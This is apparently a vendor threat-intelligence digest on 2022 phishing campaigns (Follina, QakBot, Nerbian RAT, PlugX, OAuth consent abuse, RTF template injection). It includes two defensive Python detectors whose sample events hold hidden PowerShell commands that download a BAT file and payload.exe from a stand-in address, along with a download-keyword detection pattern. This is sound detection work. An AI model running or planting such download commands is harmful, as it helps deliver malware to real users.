Follina Vulnerability Targets Government Entities

June 14, 2022

Industry: Government | Level: Tactical | Source: BleepingComputer

ProofPoint has identified the exploitation of CVE-2022-30190/Follina in phishing campaigns targeting European and US governments, distributing malicious Rich Text Format (RTF) documents. The email attempts to lure victims into opening the malicious document with promises of salary increases; once executed, a PowerShell script downloads the attacker’s payload. As tweeted by ProofPoint, “Proofpoint blocked a suspected state-aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.” BleepingComputer’s analysis of the payload identified reconnaissance activity that gathers large amounts of data. Attribution of the attacker is currently unknown, although ProofPoint’s early findings suggest a state-aligned actor.

Anvilogic Scenario:

  • CVE-2022-30190 / Follina : Attack Chain

Anvilogic Use Case:

  • CVE-2022-30190: Microsoft Office Code Execution Vulnerability

QakBot Exploiting Windows MSDT CVE-2022-30190

June 14, 2022

Industry: N/A | Level: Tactical | Source: BleepingComputer

ProofPoint’s tracking of CVE-2022-30190 identified the Qakbot/Qbot affiliate TA570 distributing the Qbot malware using the MSDT zero-day exploit. The attackers use hijacked email threads to send emails with malicious IMG file attachments containing a Word document, a shortcut/LNK file, and the QBot DLL. The LNK file loads the Qbot DLL from the IMG. The Word document downloads an HTML file exploiting the CVE-2022-30190 vulnerability, causing PowerShell code to execute and download additional payloads. The threat group TA570 has been identified as adaptable and open to experimenting with new tactics in its phishing campaigns. This year the group distributed QBot using Squiblydoo techniques in February, and following Microsoft’s auto-blocking of macros, in April 2022 TA570 distributed malicious MSI files contained within ZIP archives.

Anvilogic Use Cases:

  • CVE-2022-30190: Microsoft Office Code Execution Vulnerability

Chinese Hackers Exploit Microsoft Office Latest Zero-Day CVE-2022-30190

June 07, 2022

Industry: N/A | Level: Tactical | Source: BleepingComputer

Proofpoint has identified the Chinese state-linked threat group TA413 actively exploiting Microsoft Office’s latest zero-day, CVE-2022-30190. The observed attack targeted the international Tibetan community and was delivered in a compressed zip archive. As tweeted by ProofPoint, “TA413 CN APT spotted ITW exploiting the #Follina #0Day using URLs to deliver Zip Archives which contain Word Documents that use the technique. Campaigns impersonate the “Women Empowerments Desk” of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.”

Anvilogic Scenario:

  • CVE-2022-30190 / Follina : Attack Chain

Anvilogic Use Cases:

  • Compressed File Execution
  • CVE-2022-30190: Microsoft Office Code Execution Vulnerability

Phishing with World Health Organization Themes

May 17, 2022

Industry: N/A | Level: Tactical | Source: ProofPoint

Research from ProofPoint has identified the distribution of the Nerbian remote access trojan (RAT) through phishing emails using COVID-19 and World Health Organization themes. The campaign was traced back to a start on April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. The emails contain either a malicious document or a compressed archive containing a malicious document. Upon execution of the embedded macro, the process flow is: CMD calls PowerShell to download a BAT file, and the BAT file launches PowerShell to download additional payloads including the RAT. The RAT establishes persistence and has the capability to download additional payloads as needed. There is currently no attribution for the Nerbian RAT.

Anvilogic Scenario:

  • Nerbian RAT Infection Chain from Malicious Document

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Suspicious Executable by CMD.exe
  • Executable Create Script Process
  • Invoke-WebRequest Command
  • Executable File Written to Disk
  • Suspicious Executable by Powershell
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Create/Modify Schtasks
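The Nerbian chain above (macro, CMD, PowerShell download, BAT, second PowerShell download) is the kind of parent-child sequence the CMD, PowerShell and Invoke-WebRequest use cases look for. The following added example, which is not Anvilogic’s or Proofpoint’s code, walks constructed process-creation events and flags a PowerShell download command whose ancestry runs through cmd.exe back to an Office application; the image names, paths and the 198.51.100.7 address are constructed.

```python
"""Flag PowerShell download commands whose process ancestry runs through
cmd.exe back to an Office application, as in the Nerbian RAT chain.
Events are constructed samples, not real telemetry."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name, lowercased
    cmdline: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|curl|wget", re.I)

# Constructed events: explorer -> Word -> cmd -> PowerShell (BAT download)
# -> cmd (runs the BAT) -> PowerShell (payload download), plus a benign PowerShell.
EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", 'winword.exe "C:\\Users\\u\\invoice.docm"'),
    ProcEvent(300, 200, "cmd.exe", 'cmd.exe /c powershell -w hidden -c "iwr http://198.51.100.7/u.bat -OutFile C:\\Users\\Public\\u.bat"'),
    ProcEvent(400, 300, "powershell.exe", 'powershell -w hidden -c "iwr http://198.51.100.7/u.bat -OutFile C:\\Users\\Public\\u.bat"'),
    ProcEvent(500, 400, "cmd.exe", "cmd.exe /c C:\\Users\\Public\\u.bat"),
    ProcEvent(600, 500, "powershell.exe", 'powershell -c "Invoke-WebRequest http://198.51.100.7/payload.exe -OutFile C:\\Users\\Public\\payload.exe"'),
    ProcEvent(700, 100, "powershell.exe", "powershell Get-Process"),
]

def ancestry(events, pid):
    """Image names of pid's ancestors, nearest parent first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    pid = by_pid[pid].ppid if pid in by_pid else None
    while pid in by_pid:
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain

def find_office_download_chains(events):
    """Return pids of PowerShell downloads descended from cmd.exe under an Office process."""
    hits = []
    for e in events:
        if e.image != "powershell.exe" or not DOWNLOAD_RE.search(e.cmdline):
            continue
        anc = ancestry(events, e.pid)
        if "cmd.exe" in anc and OFFICE & set(anc):
            hits.append(e.pid)
    return hits
```

Both PowerShell downloads (pids 400 and 600) are flagged because their ancestry reaches winword.exe through cmd.exe, while the PowerShell started directly from explorer.exe is not.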
Serpent Backdoor Malware

March 29, 2022

Research from ProofPoint identifies a phishing campaign aimed at French entities in the construction, government and real estate industries.

TA416

March 15, 2022

Industry: N/A | Level: Tactical | Source: Proofpoint

Proofpoint research provides an update on activity since November 2021 involving the Chinese APT group TA416, which has been initiating targeted campaigns against European diplomatic entities. An increase in activity has been observed since Russia’s invasion of Ukraine. A new technique was identified in the group’s phishing campaigns. Initially, the threat group uses web bugs to profile victims and provide a “sign of life,” indicating to the attackers that the victim is active and can be enticed into opening malicious emails. Phishing emails have then been observed leveraging the “email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service.” Abuse of the SMTP2Go service has enabled the group to impersonate different European organizations. In the malicious phishing emails, the threat actor provides a Dropbox link to a zip file containing the PlugX malware executable. Upon execution, the malware establishes persistence through DLL search order hijacking using the PE file potplayermini.exe, associated with a public media player, and downloads additional payloads.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Executable File Written to Disk
    • Suspicious File written to Disk

TA2541

February 22, 2022

Industry: Aerospace, Aviation, Defense, Manufacturing & Transportation | Level: Tactical | Source: ProofPoint

ProofPoint provides research on the threat actor group TA2541, which has been observed since 2017 targeting “aviation, aerospace, transportation, and defense industries, among others.” The group distributes malicious remote access trojans (RATs) through crafted phishing emails containing malicious links. Following a click on the malicious link, a VBS file is downloaded that invokes PowerShell to download a malicious executable, which establishes persistence through process injection. Additional activity, system tampering to lower defenses and system information discovery, is initiated prior to the download of the RAT. The group uses a large variety of commodity RATs such as AsyncRAT, NetWire, Parallax and others. The RAT establishes persistence in the startup directory as well as through schtasks. The threat actor’s motives and objectives have yet to be identified.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Wscript/Cscript Execution
    • Powershell DLL/EXE Injection
    • New AutoRun Registry Key

“OiVaVoii” Threat Campaign

February 01, 2022

Industry: N/A | Level: Tactical | Source: ProofPoint

ProofPoint has been observing a threat campaign, OiVaVoii, since January 18th, 2022. It uses hijacked Office 365 tenants to send malicious OAuth applications with specifically crafted lures to phish targets. These apps are used to send authorization requests to targets; if a request is authorized, the attacker obtains a generated OAuth token to complete the account takeover. There are currently five identified malicious OAuth apps, three with a “Verified” publish type, one “Unverified” and the last “Unknown.” The threat actors have mainly targeted high-level executives, and to date Microsoft has blocked four of the five identified apps.

  • Anvilogic Use Case: Azure Consent Grant

RTF Template Injection

December 01, 2021

Industry: Energy (Deepwater) & Government | Level: Tactical | Source: ProofPoint

Proofpoint has observed increased usage of RTF template injection by the threat actors TA423, DoNot Team, and Gamaredon since as early as February 2021, with files publicly identified on April 5th. Template injection enables the threat actor to alter the RTF file’s control word structure, substituting a legitimate file destination with a URL from which a malicious payload can be downloaded. Detection rates for this technique have so far been low. The APT groups have been targeting various organizations and countries with this technique: DoNot Team and TA423 are both associated with targeting Malaysia’s deepwater energy exploration, while Gamaredon targeted the Ukrainian government.

  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Abuse EQNEDT32.EXE CVE-2017-11882
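RTF template injection rewrites the \*\template destination, which normally names a local .dotm, so that it points at a remote location. The added example below, which is not Proofpoint’s or Anvilogic’s code, scans RTF bytes for that control word, resolves the \'xx hex escapes used to obscure the URL, and flags remote destinations; the sample documents and the 198.51.100.7 address are constructed.

```python
"""Flag RTF files whose \*\template destination points at a remote location
(the RTF template injection technique). Sample documents are constructed."""
import re

# {\*\template <destination>}: legitimately a local .dotm path. Injection
# replaces the destination with a URL or UNC path fetched when the file opens.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\b([^}]*)\}", re.IGNORECASE)
REMOTE_RE = re.compile(rb"^(https?://|ftp://|\\\\)", re.IGNORECASE)
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")


def decode_hex_escapes(data: bytes) -> bytes:
    """Resolve RTF \'xx byte escapes, which attackers use to obscure the URL."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def find_template_destinations(rtf: bytes) -> list:
    """Return every \*\template destination in the document, escapes resolved."""
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return []
    decoded = decode_hex_escapes(rtf)
    return [m.group(1).strip() for m in TEMPLATE_RE.finditer(decoded)]


def is_template_injection(rtf: bytes) -> bool:
    """True when any template destination is a URL or UNC path."""
    return any(REMOTE_RE.match(dest) for dest in find_template_destinations(rtf))


# Constructed samples: a benign local template, an injected URL, and the same
# URL hidden behind hex escapes.
BENIGN = b"{\\rtf1\\ansi{\\*\\template C:\\\\Users\\\\u\\\\Normal.dotm}Quarterly report\\par}"
INJECTED = b"{\\rtf1\\ansi{\\*\\template http://198.51.100.7/t.dotm}Quarterly report\\par}"
OBFUSCATED = (b"{\\rtf1\\ansi{\\*\\template \\'68\\'74\\'74\\'70://198.51.100.7/t.dotm}"
              b"Quarterly report\\par}")

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("injected", INJECTED), ("obfuscated", OBFUSCATED)):
        print(name, find_template_destinations(doc), is_template_injection(doc))
```

The check is deliberately narrow to the \*\template destination; a production scanner would apply the same remote-destination test to other RTF destinations that accept paths.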